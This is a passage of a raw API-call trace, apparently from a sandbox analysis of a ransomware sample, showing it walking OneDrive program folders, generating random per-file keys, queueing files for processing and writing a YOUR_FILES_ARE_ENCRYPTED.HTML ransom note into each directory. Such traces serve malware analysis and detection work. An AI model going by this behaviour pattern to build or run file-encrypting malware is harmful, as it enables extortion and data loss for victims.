[0113.302] lstrlenW (lpString=".dll") returned 4 [0113.302] PathFindExtensionW (pszPath="FileSyncShell64.dll") returned=".dll" [0113.302] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0113.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\filesyncshell64.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0113.303] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448d594d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x448d594d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x45ee3647, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x210c0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="LoggingPlatform64.dll", cAlternateFileName="LOGGIN~1.DLL")) returned 1 [0113.303] StrStrIW (lpFirst="LoggingPlatform64.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.303] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\LoggingPlatform64.dll") returned 103 [0113.303] PathFindExtensionW (pszPath="LoggingPlatform64.dll") returned=".dll" [0113.303] lstrlenW (lpString=".dll") returned 4 [0113.303] PathFindExtensionW (pszPath="LoggingPlatform64.dll") returned=".dll" [0113.303] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0113.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\LoggingPlatform64.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\loggingplatform64.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0113.303] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=135360) returned 1 [0113.303] GetProcessHeap () returned 0x600000 [0113.303] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0113.305] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="DC") returned 2 [0113.305] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="85") returned 2 [0113.305] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="B8") returned 2 [0113.306] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="16") returned 2 [0113.306] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="34") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="4D") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="19") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="8D") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="2F") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="32") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="DF") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="94") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="DD") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="6B") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="A9") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="71") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="DB") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="EF") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="FB") returned 2 [0113.306] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="09") returned 2 [0113.306] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="DF") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="28") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="67") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="86") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="45") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="FD") returned 2 [0113.306] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="76") returned 2 [0113.306] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="78") returned 2 [0113.306] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="D4") returned 2 [0113.306] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="90") returned 2 [0113.306] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="4A") returned 2 [0113.306] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="08") returned 2 [0113.307] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\LoggingPlatform64.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\LoggingPlatform64.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\LoggingPlatform64.dll" [0113.307] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.307] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0113.307] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x471cffdb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x471cffdb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4a322aae, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0xa12a0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0113.307] StrStrIW (lpFirst="msvcp120.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.307] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll") returned 94 [0113.307] PathFindExtensionW (pszPath="msvcp120.dll") returned=".dll" [0113.307] lstrlenW (lpString=".dll") returned 4 [0113.307] PathFindExtensionW (pszPath="msvcp120.dll") returned=".dll" [0113.307] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0113.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0113.307] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fa9af2b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4fa9af2b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x59bfc168, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0113.307] StrStrIW (lpFirst="msvcr120.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.307] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll") returned 94 [0113.307] PathFindExtensionW (pszPath="msvcr120.dll") returned=".dll" [0113.307] lstrlenW (lpString=".dll") returned 4 [0113.307] PathFindExtensionW (pszPath="msvcr120.dll") returned=".dll" [0113.307] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0113.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0113.308] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fa9af2b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4fa9af2b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x59bfc168, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="msvcr120.dll", cAlternateFileName="")) returned 0 [0113.308] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.308] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.308] GetProcessHeap () returned 0x600000 [0113.308] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.309] WriteFile (in: hFile=0x330, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.310] CloseHandle (hObject=0x330) returned 1 [0113.310] GetProcessHeap () returned 0x600000 [0113.310] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.310] GetProcessHeap () returned 0x600000 [0113.310] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.310] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bc05a4c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5bc05a4c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5bc05a4c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ar", cAlternateFileName="")) returned 1 [0113.310] StrStrIW (lpFirst="ar", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.310] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ar") returned 78 [0113.310] GetProcessHeap () returned 0x600000 [0113.310] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.310] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ar" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ar") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ar" [0113.310] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ar\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ar\\*" [0113.310] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ar\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bc05a4c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5bc05a4c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5c3eb6a8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.311] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bc05a4c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5bc05a4c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5c3eb6a8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="..", cAlternateFileName="")) returned 1 [0113.311] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c3eb6a8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5c3eb6a8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5c6c0410, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x138c0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.311] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.311] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ar\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.311] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.312] lstrlenW (lpString=".mui") returned 4 [0113.312] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.312] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c3eb6a8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5c3eb6a8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5c6c0410, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x138c0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.312] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.312] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.312] GetProcessHeap () returned 0x600000 [0113.312] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.313] WriteFile (in: hFile=0x330, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.349] CloseHandle (hObject=0x330) returned 1 [0113.353] GetProcessHeap () returned 0x600000 [0113.353] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.353] GetProcessHeap () returned 0x600000 [0113.353] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.354] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c758e02, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5c758e02, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5c758e02, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="as-in", cAlternateFileName="")) returned 1 [0113.354] StrStrIW (lpFirst="as-in", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.354] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\as-in") returned 81 [0113.354] GetProcessHeap () returned 0x600000 [0113.354] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.356] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\as-in" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\as-in") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\as-in" [0113.356] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\as-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\as-in\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\as-in\\*" [0113.356] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\as-in\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c758e02, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5c758e02, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5d1a1361, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.356] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c758e02, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5c758e02, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5d1a1361, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="..", cAlternateFileName="")) returned 1 [0113.357] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d1a1361, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5d1a1361, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5d7e32a2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.357] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.357] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\as-in\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.357] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.357] lstrlenW (lpString=".mui") returned 4 [0113.357] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.357] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d1a1361, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5d1a1361, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5d7e32a2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x632ea0, dwReserved1=0x2c0c16b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.357] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.357] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\as-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.357] GetProcessHeap () returned 0x600000 [0113.357] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\as-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\as-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.359] WriteFile (in: hFile=0x32c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.360] CloseHandle (hObject=0x32c) returned 1 [0113.360] GetProcessHeap () returned 0x600000 [0113.360] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.360] GetProcessHeap () returned 0x600000 [0113.360] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.361] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2ca5e9b, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd2ca5e9b, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd2dd71af, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x123c, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayLogo.png", cAlternateFileName="AUTOPL~1.PNG")) returned 1 [0113.361] StrStrIW (lpFirst="AutoPlayLogo.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.361] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayLogo.png") returned 92 [0113.361] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0113.361] lstrlenW (lpString=".png") returned 4 [0113.361] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0113.361] SystemFunction036 (in: RandomBuffer=0x19e16c, 